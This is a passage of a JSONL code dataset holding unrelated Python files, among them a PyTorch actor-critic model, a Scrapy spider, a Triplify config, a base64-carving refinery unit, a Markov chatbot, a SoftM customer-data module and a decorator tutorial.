F.relu(self.hidden1(x))\n        x = F.relu(self.hidden2(x))\n        value = self.out(x)\n\n        return value\n\nclass CriticV(nn.Module):\n    def __init__(\n        self,\n        in_dim: int,\n        hidden_dim1: int = 128,\n        hidden_dim2: int = 128):\n        super().__init__()\n\n        self.hidden1 = nn.Linear(in_dim, hidden_dim1)\n        self.hidden2 = nn.Linear(hidden_dim1, hidden_dim2)\n        self.out = nn.Linear(hidden_dim2, 1)\n        self.out = init_layer_uniform(self.out)\n\n    def forward(\n        self,\n        state: torch.Tensor) -> torch.Tensor:\n        x = F.relu(self.hidden1(state))\n        x = F.relu(self.hidden2(x))\n        value = self.out(x)\n\n        return value\n","sub_path":"models/actor_critic.py","file_name":"actor_critic.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"644014603","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\nclass TiempoMeteoSpider(scrapy.Spider):\n    name = 'tiempoMeteo'\n\n    def start_requests(self):\n        base_url = \"https://www.transfermarkt.es/laliga/startseite/wettbewerb/ES1/saison_id/2018/plus/1\"\n        yield scrapy.Request(url=base_url)\n\n    def parse(self, response):\n        resumen = {\n            'tabla': response.xpath('//*[@id=\"yw1_c0\"]').extract_first()\n        }\n        yield resumen","sub_path":"quotesbot-master/quotesbot/spiders/tiempo_meteorolgogico-xpath.py","file_name":"tiempo_meteorolgogico-xpath.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"292631512","text":"\"\"\"\nThis file contains the configuration for triplify.\nTriplify rapidly simplifies the creation of structured content for Web 2.0\nmashups and Semantic Web applications.\nTriplify uses a number of SQL queries, whose results are converted into\neither RDF/N3, JSON or Linked Data.\n\n@version $Id:$\n@license LGPL\n@copyright 2008 Remon Georgy (remon.sherin@gmail.com)\n\"\"\"\nimport MySQLdb\n\ntriplify = {}\n\n\"\"\"\nTriplify uses a PDO object to connect to the database.\nThe following line creates an appropriate PDO object for a MySQL database.\nPlease adjust the values for database name, user and password.\nFor maximum security, you can create a database user specifically for\nTriplify, which has read-only access to the columns of your database\nschema that should be made public. Alternatively, you can include the\nconfiguration of your Web application and reuse its credentials here.\n\"\"\"\ntriplify['db'] = MySQLdb.connect(host=\"localhost\", user=\"user\", passwd=\"password\", db=\"database\")\n\n\"\"\"\nTriplify uses URIs to identify objects. In order to simplify their handling\nyou should define shortcuts (i.e. namespace prefixes) for all namespaces\nfrom which you want to use URIs.\nA 'vocabulary' entry is mandatory - it specifies which default prefix\nshould be used for vocabulary elements such as classes and properties. Other\nthan the prefix for instances this prefix should be shared between different\ninstallations of a certain Web application on the Web.\n\"\"\"\n\ntriplify['namespaces'] = {\n    'vocabulary':'http://byteflow.rgeorgy.com/triplify/vocabulary/',\n    'rdf':'http://www.w3.org/1999/02/22-rdf-syntax-ns#',\n    'rdfs':'http://www.w3.org/2000/01/rdf-schema#',\n    'owl':'http://www.w3.org/2002/07/owl#',\n    'foaf':'http://xmlns.com/foaf/0.1/',\n    'sioc':'http://rdfs.org/sioc/ns#',\n    'sioctypes':'http://rdfs.org/sioc/types#',\n    'dc':'http://purl.org/dc/elements/1.1/',\n    'dcterms':'http://purl.org/dc/terms/',\n    'skos':'http://www.w3.org/2004/02/skos/core#',\n    'tag':'http://www.holygoat.co.uk/owl/redwood/0.1/tags/',\n    'xsd':'http://www.w3.org/2001/XMLSchema#',\n    'update':'http://triplify.org/vocabulary/update#'}\n\n\"\"\"\nThe core of Triplify is a set of SQL queries, which select the information\nto be made available.\nYou can provide a number of arbitrary queries. Each query, however, should\nselect information about an object of a certain type. This type, which serves\nas an index in the associative queries configuration array, is also used to\nconstruct corresponding URIs for the objects returned by the query.\nThe first column returned by the query represents the ID of the object and\nhas to be named \"id\"; all other columns represent characteristics (or\nproperties) of this object. As column identifier you should reuse existing\nvocabularies whenever possible. If your \"user\" table, for example, contains a\ncolumn named \"first_name\" this can be easily mapped to the corresponding FOAF\nproperty using: \"SELECT id,first_name AS 'foaf:firstName' FROM user\".\nYou can use the following column naming convention in order to inform\nTriplify about the datatype or language of a column:\nSELECT id,price AS 'price^^xsd:decimal',desc AS 'rdf:label@en' FROM products\nHowever, Triplify tries to autodetect and convert timestamps appropriately.\nSimilarly, you can indicate that a column represents an objectProperty\npointing to other objects (foreign key):\nSELECT id,user_id 'sioc:has_creator->user'\nOnly select information that does not contain sensitive data and\ncan be made public. For example, email addresses and password (hashes) should\nnever be exposed. However, you can use the database function SHA to\nmask email addresses, e.g.:\nSELECT SHA(CONCAT('mailto:',email)) AS 'foaf:mbox_sha1sum' FROM users\nThe following queries are example queries and have to be replaced by queries\nsuitable for your database schema.\n\"\"\"\n\ntriplify['queries'] = {\n    'post':[\n        \"\"\"SELECT\n            p.id AS id,\n            p.name AS 'dc:title',\n            p.text AS 'sioc:content',\n            u.username AS 'sioc:has_creator',\n            p.upd_date AS 'dcterms:modified',\n            p.date AS 'dcterms:created'\n        FROM blog_post p INNER JOIN auth_user u ON(p.author_id=u.id)\"\"\"],\n    'user':[\n        \"\"\"SELECT\n            id,\n            username AS 'foaf:name',\n            SHA(CONCAT('mailto:',email)) AS 'foaf:mbox_sha1sum'\n        FROM auth_user\"\"\"],\n    'update':[\n        \"\"\"SELECT\n            p.upd_date AS id,\n            p.id AS 'update:updatedResource->post'\n        FROM blog_post p\"\"\"]}\n\n\"\"\"\nSome of the columns of the Triplify queries will contain references to other\nobjects rather than literal values. The following configuration array\nspecifies which columns are references to objects of which type.\n\"\"\"\n\ntriplify['objectProperties'] = {\n    'sioc:has_creator':'user'}\n\n\"\"\"\nObjects are classified according to their type. However, you can specify\na mapping here if objects of a certain type should be associated with a\ndifferent class (e.g. classify all users as 'foaf:person'). If you are\nunsure it is safe to leave this configuration array empty.\n\"\"\"\n\ntriplify['classMap'] = {\n    'user':'foaf:person'}\n\n\"\"\"\nYou can attach license information to your content.\nA popular license is Creative Commons Attribution, which allows sharing and\nremixing under the condition of attributing the original author.\n\"\"\"\ntriplify['license'] = 'http://creativecommons.org/licenses/by/3.0/us/'\n\n\"\"\"\nAdditional metadata\nYou can add arbitrary metadata. The keys of the following array are\nproperties, the values will be represented as respective property values.\n\"\"\"\n\ntriplify['metadata'] = {\n    'dc:title':'',\n    'dc:publisher':''}\n\n\"\"\"\nSet this to True in order to register your linked data endpoint with the\nTriplify registry (http://triplify.org/Registry).\nRegistering is absolutely recommended, since that allows other Web sites\n(e.g. peer Web applications, search engines and mashups) to easily find your\ncontent. Requires the PHP ini variable allow_url_fopen set to true.\nYou can also register your data source manually by accessing register.php in\nthe triplify folder, or at: http://triplify.org/Registry\n\"\"\"\n\ntriplify['register'] = True\n\n\"\"\"\nYou can specify for how long generated files should be cached. For smaller\nWeb applications it is safe to disable caching by setting this value to zero.\n\"\"\"\n\n#triplify['TTL'] = 100\n\"\"\"\nDirectory to be used for caching\n\"\"\"\ntriplify['cachedir'] = 'cache/'\n\n\"\"\"\nLinked Data Depth\nSpecify on which URI level to expose the data - possible values are:\n - Use 0 or omit to expose all available content on the highest level;\n   all content will be exposed when /triplify/ is accessed on your server.\n - Use 1 to publish only links to the classes on the highest level; all\n   content will be exposed when for example /triplify/user/ is accessed.\n - Use 2 to publish only links on the highest and class levels; all\n   content will be exposed on the instance level, e.g. when /triplify/user/1/\n   is accessed.\n\"\"\"\n\ntriplify['LinkedDataDepth'] = '2'\n\n\"\"\"\nCallback Functions\nSome of the columns of the Triplify queries will contain data which has to\nbe processed before being exposed as RDF (literals). This configuration array\nmaps column names to the respective functions, which have to take the data\nvalue as a parameter and return it processed.\n\"\"\"\n\ntriplify['CallbackFunctions'] = {}","sub_path":"triplify-python/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"424334354","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom ..pattern.carve import arg, carve\nfrom ..compression.decompress import decompress\n\n\nclass carveb64z(carve):\n    \"\"\"\n    Carves base64 encoded expressions, decodes them, and then applies the `refinery.decompress`\n    unit to the result. By default, only the longest base64 string is processed.\n    \"\"\"\n    def __init__(\n        self, single: arg.switch('-m', '--multi', help='Process all base64 strings instead of just the longest.') = True,\n        min=1, max=None, stripspace=False, unique=False, longest=False, take=None, utf16=True, ascii=True\n    ):\n        self.superinit(super(), format='b64', decode=True, **vars())\n        self.decompressor = decompress()\n\n    def process(self, data):\n        for chunk in super().process(data):\n            yield self.decompressor(chunk)\n","sub_path":"refinery/units/shortcuts/carveb64z.py","file_name":"carveb64z.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"56492659","text":"import re\nimport random\nimport makeMarkov\nimport analyzer\nfrom itertools import chain  # itertoolsモジュールからchainをインポート\n\nclass ChatBot(object):\n    \"\"\"ChatBotクラス\n    応答に使用する文章の生成と、実際に応答するためのメッセージを返す処理を行う。\n\n    Attributes:\n        sentences(strのlist): マルコフ連鎖を利用して生成した文章のリスト。\n\n    \"\"\"\n    def __init__(self):\n        \"\"\"\n        MakeMarkovオブジェクトを生成し、文章の生成と前処理を行う。\n\n        \"\"\"\n        # MakeMarkovオブジェクトを生成\n        markov = makeMarkov.MakeMarkov()\n        # マルコフ連鎖で生成された文章群を取得\n        text = markov.make()\n        # 各文章の末尾の改行で分割してリストに格納\n        self.sentences = text.split('。')\n        # リストから空の要素を取り除く\n        if '' in self.sentences:\n            self.sentences.remove('')\n\n    def dialogue(self, input):\n        \"\"\"\n        マルコフ連鎖によって生成された文章群から\n        ユーザーの発言に含まれる名詞を含むものを抽出して応答メッセージとして返す。\n\n        Parameters:\n            input(str) :ユーザーによって入力された文字列。\n        Returns:\n            str: 応答メッセージ。\n        \"\"\"\n        # インプット文字列を形態素解析\n        parts = analyzer.analyze(input)\n\n        m = []\n        # 解析結果の形態素と品詞に対して反復処理\n        for word, part in parts:\n            # インプット文字列に名詞があればそれを含むマルコフ連鎖文を検索\n            if analyzer.keyword_check(part):\n                # print('after_check_word===', word)\n                # マルコフ連鎖で生成した文章を1つずつ処理\n                for element in self.sentences:\n                    # 形態素の文字列がマルコフ連鎖の文章に含まれているか検索する\n                    # 
最後を'.*?'にすると「花」のように検索文字列だけにもマッチ\n #\n # + '.*'として検索文字列だけにマッチしないようにする\n #\n find = '.*?' + word + '.*'\n # マルコフ連鎖文にマッチさせる\n tmp = re.findall(find, element)\n if tmp:\n # マッチする文章があればリストmに追加\n m.append(tmp)\n # findall()はリストを返してくるので多重リストをフラットにする\n m = list(chain.from_iterable(m))\n \n if m:\n # インプット文字列の名詞にマッチしたマルコフ連鎖文からランダムに選択\n return random.choice(m)\n else:\n # マッチするマルコフ連鎖文がない場合\n return random.choice(self.sentences)\n","sub_path":"chap10/sec02/chatBot.py","file_name":"chatBot.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"598897966","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nkunden.py - High Level Access Kundeninformationen. Teil von huSoftM.\n\nCreated by Maximillian Dornseif on 2007-04-13.\nCopyright (c) 2007 HUDORA GmbH. All rights reserved.\n\"\"\"\n\nimport datetime\nimport husoftm.connection2\nimport cs.caching as caching\nimport husoftm.tools\nimport warnings\n\n\nclass Kunde(object):\n \"\"\"Representation of SoftM \"Kunden\" data objects.\"\"\"\n\n def __init__(self, kundennr='', name1='', name2='', name3='', name4='',\n strasse='', plz='', ort='', land=''):\n warnings.warn(\"husoftm.kunden is deprecated, use husoftm2.kunden instead\",\n DeprecationWarning, stacklevel=2)\n self.kundennr = kundennr\n self.name1 = name1\n self.name2 = name2\n self.name3 = name3\n self.name4 = name4\n self.strasse = strasse\n self.plz = plz\n self.ort = ort\n self.land = land\n self.sortierfeld = self.fax = self.tel = self.aenderung = self.iln = self.erfassung = None\n self.sachbearbeiter = self.mail = self.mobil = self.unsere_lieferantennr = self.adressdatei_id = None\n\n def __repr__(self):\n return str(vars(self)) # crude ...\n\n def fill_from_softm(self, row):\n \"\"\"Initializes the object from data returned by SoftM.\"\"\"\n self.kundennr = row.get('kundennr', '') # 10003\n self.sortierfeld = row.get('sortierfeld', '') # AUER* NEUB\n self.name1 = row.get('name1', '') # Sport ...\n self.name2 = row.get('name2', '')\n self.name3 = row.get('name3', '')\n #self.name4 = row.get('name4', '')\n self.strasse = row.get('strasse', '')\n self.plz = row.get('plz', '')\n self.ort = row.get('ort', '')\n self.tel = row.get('tel', '')\n self.fax = row.get('fax', '')\n #self.url = row.get('url', '')\n self.mobil = row.get('mobil', '')\n self.mail = row.get('mail', '')\n #self.kundengruppe = row.get('kundengruppe_id', '')\n #self.postfach = row.get('postfach', '')\n #self.postfach_plz = row.get('postfach_plz', '')\n #self.created_at = row.get('erfassung_date', '') # 2004-12-01\n #self.updated_at = row.get('aendertung_date', '') # 2007-04-11\n #self.mitgliedsnr = row.get('mitgliedsnr', '')\n #self.ustid = row.get('ustid', '') # '132838685'\n self.adressdatei_id = row.get('adressdatei_id', '') # 123656179\n #self.company = row.get('company', '') # '06'\n #self.verband = row.get('verband', '')\n #self.gebiet = row.get('gebiet', '') # ': u'04'\n #self.distrikt = row.get('distrikt', '') # ': u'16'\n #self.vertreter = row.get('vertreter', '') # ': u'201'\n #self.branche = row.get('branche', '') # ': u'13'\n #self.versandart = row.get('versandart', '') # ': u''\n if 'iln' in row:\n self.iln = unicode(int(row['iln'])).strip()\n self.land = husoftm.tools.land2iso(row['laenderkennzeichen']) # D\n if row['erfassung_date']:\n self.erfassung = row['erfassung_date']\n if row['aenderung_date']:\n self.aenderung = row['aenderung_date']\n else:\n self.aenderung = self.erfassung\n self.sachbearbeiter = 
row.get('sachbearbeiter', '') # ': u'Birgit Bonrath'\n #self.verpackungsvorschrift = row.get('verpackungsvorschrift', '') # ': u'',\n #self.lieferbedingung = row.get('lieferbedingung', '') # ': u''\n #self.auslieferunglager = row.get('auslieferunglager', 0) # ': 0\n #self.interne_firmennr = row.get('interne_firmennr', '') # ': u''\n self.unsere_lieferantennr = row.get('unsere_lieferantennumemr', '')\n self.verband = row.get('verband', '')\n self.mitgliedsnr = row.get('mitgliedsnr', '')\n self.ustid = row.get('ustid', '')\n self.kundengruppe = row.get('kundengruppe', '')\n self.vertreter = row.get('vertreter', '')\n self.gebiet = row.get('gebiet', '')\n self.branche = row.get('branche', '')\n self.distrikt = row.get('distrikt', '')\n # 'skontoschluessel': 16,\n # 'mahnsperre': u'',\n # 'delcredereschl\\xc3\\xbcssel': 0,\n # 'bonnitaet': u'',\n # 'liefersperre': 0,\n # 'kreditlimit2': 0,\n # 'lastschrift': u'',\n # 'offener_aftragswert': 2.7000000000000002,\n # 'kreditlimit': 2.7000000000000002,\n # 'inland_ausland': 0,\n # self.satzstatus = row.get('satzstatus', '')\n self.satzstatus = husoftm.connection2.get_connection().query('XKD00', fields=['KDSTAT'], condition=\"KDKDNR = %s\" % husoftm.tools.sql_quote(row.get('kundennr')))\n return self\n\n\ndef get_kundennummern():\n \"\"\"Returns a list of all 'Kundennummern'.\"\"\"\n\n warnings.warn(\"husoftm.kunden is deprecated, use husoftm2.kunden instead\",\n DeprecationWarning, stacklevel=2)\n rows = husoftm.connection2.get_connection().query('XKD00', fields=['KDKDNR'])\n return [int(x[0]) for x in rows]\n\n\ndef get_changed_after(date):\n \"\"\"Returns a list of all Kundennummern where the underlaying Data has changed since .\"\"\"\n\n warnings.warn(\"husoftm.kunden is deprecated, use husoftm2.kunden instead\",\n DeprecationWarning, stacklevel=2)\n date = int(date.strftime('1%y%m%d'))\n rows = husoftm.connection2.get_connection().query('XKD00', fields=['KDKDNR'],\n condition=\"KDDTER>%d OR KDDTAE>=%d\" % (date, date))\n ret = set([int(x[0]) for x in rows])\n #\n rows = husoftm.connection2.get_connection().query('AKZ00', fields=['KZKDNR'],\n condition=\"KZDTAE>=%d\" % (date))\n ret = ret | set([int(x[0]) for x in rows])\n return list(ret)\n\n\n#@caching.cache_function(60*60*2)\ndef get_kunde(kdnnr):\n \"\"\"Get the Kunde object representing Kundennummer .\n\n must be an Integer in the Range 10000..99999.\n If no data exists for that KdnNr ValueError is raised.\"\"\"\n\n warnings.warn(\"husoftm.kunden is deprecated, use husoftm2.kunden instead\",\n DeprecationWarning, stacklevel=2)\n rows = husoftm.connection2.get_connection().query(['XKD00', 'XKS00', 'AKZ00'],\n condition=\"KDKDNR='%8d' AND KSKDNR='%8d' AND KZKDNR LIKE '%s'\" % (int(kdnnr), int(kdnnr),\n '%' + str(kdnnr)))\n if not rows:\n # no AKZ00 entry\n rows = husoftm.connection2.get_connection().query(['XKD00', 'XKS00'],\n condition=\"KDKDNR='%8d' AND KSKDNR='%8d'\" % (int(kdnnr), int(kdnnr)))\n if not rows:\n # no XKS00 entry\n rows = husoftm.connection2.get_connection().query(['XKD00', 'AKZ00'],\n condition=\"KDKDNR='%8d' AND KZKDNR='%8d'\" % (int(kdnnr), int(kdnnr)))\n if not rows:\n # no AKZ and XKS00 entry\n rows = husoftm.connection2.get_connection().query(['XKD00'],\n condition=\"KDKDNR='%8d'\" % (int(kdnnr)))\n if len(rows) > 1:\n raise RuntimeError(\"Mehr als einen Kunden gefunden: %r\" % kdnnr)\n\n if not rows:\n raise ValueError(\"Keine Daten für Kundennummer %r gefunden\" % kdnnr)\n\n return Kunde().fill_from_softm(rows[0])\n\n\n@caching.cache_function(60 * 60 * 2)\ndef 
get_kunde_by_iln(iln):\n \"\"\"Get Kunden Address based on ILN.\n\n See http://cybernetics.hudora.biz/projects/wiki/AddressProtocol for the structure of returned data.\n\n must be an valit GLN/ILN encoded as an String.\n If no data exists for that GLN/ILN ValueError is raised.\n \"\"\"\n\n warnings.warn(\"husoftm.kunden is deprecated, use husoftm2.kunden instead\",\n DeprecationWarning, stacklevel=2)\n rows = husoftm.connection2.get_connection().query(['XKS00'], condition=\"KCE2IL='%s'\" % (int(iln), ))\n if rows:\n # stammadresse\n return get_kunde(rows[0]['kundennr'])\n else:\n # abweichende Lieferadresse\n rows = husoftm.connection2.get_connection().query(['AVA00'], condition=\"VAILN='%s'\" % (int(iln), ))\n if rows:\n rows2 = husoftm.connection2.get_connection().query(['XXA00'],\n condition=\"XASANR='%s'\" % (int(rows[0]['satznr']), ))\n if rows2:\n kunde = Kunde().fill_from_softm(rows2[0])\n kunde.kundennr = kunde.kundennr + ('.%03d' % int(rows[0]['versandadressnr']))\n return kunde\n raise ValueError(\"Keine Daten für GLN/ILN %r gefunden\" % iln)\n\n\ndef get_lieferadressen(kdnr):\n \"\"\"Sucht zusätzliche Lieferadressen für eine Kundennr raus.\n\n Gibt eine Liste aller möglichen Lieferadressen in Form von Kunden-Objekten zurück.\n >>>get_lieferadressen(13041)\n [{'sortierfeld': '', 'tel': '+49 2041 690000', 'erfassung': datetime.date(2004, 12, 16),\n 'strasse': 'An der Knippenburg 4', 'kundennr': '13041.001', 'mobil': '', 'gebiet': '',\n 'aenderung': datetime.date(2004, 12, 16), 'mail': '', 'adressdatei_id': '', 'ustid': '',\n 'distrikt': '', 'fax': '', 'ort': 'Bottrop', 'plz': '46238', 'vertreter': '', 'sachbearbeiter': '',\n 'name4': '', 'name2': 'Schuhe GmbH & Co. KG', 'name3': 'Distributionszentrum West',\n 'name1': 'Heinrich Deichmann', 'kundengruppe': '', 'land': 'DE', 'verband': '', 'iln': u'',\n 'unsere_lieferantennr': '', 'mitgliedsnr': '', 'branche': ''},\n {'sortierfeld': '', 'tel': '+ 49 9852 9060', 'erfassung': datetime.date(2004, 12, 16), 'strasse': 'Deichmann-Str. 1',\n 'kundennr': '13041.002', 'mobil': '', 'gebiet': '', 'aenderung': datetime.date(2004, 12, 16), 'mail': '',\n 'adressdatei_id': '', 'ustid': '', 'distrikt': '', 'fax': '', 'ort': 'Feuchtwangen', 'plz': '91555', 'vertreter': '',\n 'sachbearbeiter': '', 'name4': '', 'name2': 'Schuhe GmbH & Co. KG', 'name3': u'Distributionszentrum S\\xfcd',\n 'name1': 'Heinrich Deichmann', 'kundengruppe': '', 'land': 'DE', 'verband': '', 'iln': u'',\n 'unsere_lieferantennr': '', 'mitgliedsnr': '', 'branche': ''},\n ...]\n \"\"\"\n warnings.warn(\"husoftm.kunden is deprecated, use husoftm2.kunden instead\",\n DeprecationWarning, stacklevel=2)\n avrows = husoftm.connection2.get_connection().query(['AVA00'], condition=\"VAKDNR='%8s' AND VASTAT <>'X'\" % int(kdnr))\n kunden = []\n for row in avrows:\n xarows = husoftm.connection2.get_connection().query(['XXA00'], condition=\"XASANR='%s'\" %\n int(row['satznr']))\n if xarows:\n assert(len(xarows) == 1)\n kunde = Kunde().fill_from_softm(xarows[0])\n kunde.kundennr = kunde.kundennr + ('.%03d' % int(row['versandadressnr']))\n kunden.append(kunde)\n return kunden\n\n\ndef get_lieferadressen_all():\n \"\"\"Gibt ein dict mit allen vorhandenen zusätzlichen Lieferadressen zurück.\n\n Key dieses dicts ist die erweiterte Kundennummer (zB. 
'17200.001' == kundennr.versandadressnr).\n Value ist ein dict entsprechend dem AdressProtocol.\n\n \"\"\"\n warnings.warn(\"husoftm.kunden is deprecated, use husoftm2.kunden instead\",\n DeprecationWarning, stacklevel=2)\n rows = husoftm.connection2.get_connection().query(['AVA00', 'XXA00'], condition=\"XAKZRS = 7 AND XASANR=VASANR\")\n return dict((\"%s.%03d\" % (row['kundennr'], int(row['versandadressnr'])), row) for row in rows)\n\n\n@caching.cache_function(60 * 60 * 2)\ndef get_kundenbetreuer(kundennr):\n \"\"\"'Liefert einen String, der den Betreuer im Hause für einen bestimmten Kunden identifizert oder ''.\"\"\"\n rows = husoftm.connection2.get_connection().query(['AKZ00'], fields=['KZINFO'],\n condition=\"KZKDNR LIKE '%s'\" % ('%' + str(kundennr)))\n if rows:\n return rows[0][0]\n return ''\n\n\ndef offene_posten(kundennr):\n \"\"\"Offene Posten für diesen Kunden ermitteln.\"\"\"\n rows = husoftm.connection2.get_connection().query('BOP00', fields=[\"OPRGSH\", \"SUM(OPOPBT)\"],\n condition=\"OPPKTO='%8s'\" % int(kundennr),\n grouping='OPRGSH')\n offene_posten = dict(rows)\n summe = float(offene_posten.get('S', 0)) - float(offene_posten.get('H', 0))\n return summe\n\n\ndef kredit_limit(kundennr):\n \"\"\"Höhe des Kreditlimits für diesen Kunden zurückgeben.\"\"\"\n rows = husoftm.connection2.get_connection().query('XKS00', condition=\"KSKDNR='%8s'\" % int(kundennr))\n return rows[0]['kreditlimit2']\n\n\ndef _selftest():\n \"\"\"Test basic functionality\"\"\"\n get_kundenbetreuer('17200')\n get_kunde_by_iln('4306544031019')\n get_kunde_by_iln('4306544000008')\n get_changed_after(datetime.date(2007, 1, 1))\n get_kundennummern()\n #for kdnnr in nummern:\n # get_kunde(kdnnr=kdnnr) # ['aendertung_date']\n\nif __name__ == '__main__':\n _selftest()\n","sub_path":"husoftm/kunden.py","file_name":"kunden.py","file_ext":"py","file_size_in_byte":12734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"381298857","text":"from sklearn import svm\nfrom sklearn import datasets\n\nclf = svm.SVC(gamma='scale')\niris = datasets.load_iris()\nX, y = iris.data, iris.target\ninfo = clf.fit(X, y)\nprint(info)\n\nimport pickle\ns = pickle.dumps(clf)\nclf2=pickle.loads(s)\ninfo = clf2.predict(X[0:1])\nprint(info)\nprint(y[0])\n","sub_path":"sklearn_test/pick_test.py","file_name":"pick_test.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"370719288","text":"from django.core.urlresolvers import reverse\n\nfrom core import views\nfrom casestudy import casestudies\n\n\ndef test_landing_page(client):\n url = reverse('landing-page')\n\n response = client.get(url)\n\n assert response.status_code == 200\n assert response.template_name == [views.LandingPagelView.template_name]\n assert response.context_data['casestudies'] == [\n casestudies.MARKETPLACE,\n casestudies.HELLO_BABY,\n casestudies.YORK,\n ]\n","sub_path":"core/tests/test_core_views.py","file_name":"test_core_views.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"386748180","text":"# -*- encoding:utf8 -*-\n\nfrom ConnectDB import ConnectDB\nimport threading\nfrom Config import Config\n\nclass DALPool(object):\n thr=threading.Lock()\n # 创建连接池\n pool = []\n db_no = \"0\"\n\n @staticmethod\n def init(db_no=\"0\"):\n DALPool.db_no = db_no\n for i in xrange(0,Config.CONNNUM):\n 
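# pre-fill the pool with Config.CONNNUM pooled connections to database db_no\n            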
DALPool.pool.append(ConnectDB.get_pool_conn(db_no))\n\n # 获取连接\n @staticmethod\n def get_conn(db_no=\"0\"):\n ConnectDB.thr.acquire()\n if len(DALPool.pool)==0:\n for i in xrange(0,3):\n DALPool.pool.append(ConnectDB.get_pool_conn(db_no))\n ConnectDB.thr.release()\n return DALPool.pool.pop(0)\n\n # 还回连接\n @staticmethod\n def ret_conn(conn):\n ConnectDB.thr.acquire()\n DALPool.pool.append(conn)\n ConnectDB.thr.release()\n\n @staticmethod\n def get_encoding(db_no=\"0\"):\n return ConnectDB.get_encoding(db_no)\n\n # 清空连接\n @staticmethod\n def clear_conn():\n ConnectDB.thr.acquire()\n for conn in DALPool.pool:\n conn.close()\n ConnectDB.thr.release()\n DALPool.pool = []\n\n\n def __del__(self):\n DALPool.clear_conn()","sub_path":"股票流水记账合并/MergeExcel/DALPool.py","file_name":"DALPool.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"586879425","text":"#encoding=utf-8\r\n'''\r\n装饰器\r\n''' \r\n\r\nimport time\r\nfrom functools import wraps\r\n \r\n # 定义一个计时器,传入一个,并返回另一个附加了计时功能的方法 \r\ndef timeit(func): \r\n # 定义一个内嵌的包装函数,给传入的函数加上计时功能的包装\r\n #此处若不用wraps,包装后用反射显示函数名是wrapper,所以用反射会出现问题,为避免该情况,要用functools.wraps\r\n @wraps(func)\r\n def wrapper(): \r\n start = time.clock() \r\n b=func() \r\n end =time.clock() \r\n print('used:', end - start)\r\n print(b+1)\r\n # 将包装后的函数返回 \r\n return wrapper \r\n\r\n'''原理'''\r\ndef foo():\r\n print('in foo()')\r\n c=1\r\n return c\r\n\r\n'''语法糖,其实就是foo=timeit(foo)的简写'''\r\n@timeit\r\ndef simple_foo():\r\n print('in simple_foo()')\r\n a=1\r\n return a\r\n\r\ndef timeit2(func,*args): \r\n # 定义一个内嵌的包装函数,给传入的函数加上计时功能的包装\r\n @wraps(func,*args)\r\n def wrapper(*args): \r\n start = time.clock() \r\n result=func()\r\n end =time.clock() \r\n print('used:', end - start)\r\n for i in range(len(result[\"a\"])):\r\n print(result[\"a\"][i])\r\n # 将包装后的函数返回 \r\n return wrapper\r\n\r\nclass decorator(): \r\n @staticmethod\r\n def foo(*args):\r\n s='A foo()'\r\n a=args\r\n print(s)\r\n return {\"s\":s,\"a\":a}\r\n \r\n @staticmethod\r\n @timeit2\r\n def simple_foo(*args):\r\n s='A simple_foo()'\r\n a=args\r\n print(s)\r\n return {\"s\":s,\"a\":a}\r\n \r\n @staticmethod\r\n @timeit2\r\n def simple_foo2(a1,a2):\r\n s='A simple_foo()'\r\n print(s)\r\n return {\"s\":s,\"a1\":a1,\"a2\":a2}\r\n \r\ndef timeit3(func): \r\n # 定义一个内嵌的包装函数,给传入的函数加上计时功能的包装 \r\n def wrapper(): \r\n start = time.clock() \r\n result=func()\r\n end =time.clock() \r\n print('used:', end - start)\r\n print(result[\"a\"])\r\n # 将包装后的函数返回 \r\n return wrapper\r\n\r\nx=1\r\nclass decorator2(): \r\n @staticmethod\r\n def foo():\r\n s='A foo()'\r\n a=1\r\n print(s)\r\n print(x)\r\n return {\"s\":s,\"a\":a}\r\n \r\n @staticmethod\r\n @timeit3\r\n def simple_foo():\r\n s='A simple_foo()'\r\n a=2\r\n print(s)\r\n return {\"s\":s,\"a\":a}\r\n \r\ndef bread(func) : \r\n def wrapper() : \r\n print(\"\")\r\n func() \r\n print(\"<\\______/>\")\r\n return wrapper \r\n\r\n#累积装饰器,是有先后顺序的,越靠近func的越晚执行\r\ndef ingredients(func) : \r\n def wrapper() : \r\n print(\"#tomatoes#\")\r\n func() \r\n print(\"~salad~\")\r\n return wrapper \r\n \r\ndef sandwich(food=\"--ham--\") : \r\n print(food)\r\n\r\n@ingredients \r\n@bread \r\ndef strange_sandwich(food=\"--ham--\") : \r\n print(food)\r\n \r\n\r\nif __name__ == '__main__':\r\n foo=timeit(foo)\r\n foo()\r\n print(foo.__name__)\r\n\r\n simple_foo()\r\n print(simple_foo.__name__)\r\n\r\n decorator.foo(1)\r\n foo=timeit2(decorator.foo)\r\n foo(2,3)\r\n decorator.simple_foo(3,4)\r\n 
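# functools.wraps copies __name__ and other metadata from the wrapped\r\n    # function, so the reflection below reports 'simple_foo', not 'wrapper'\r\n    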
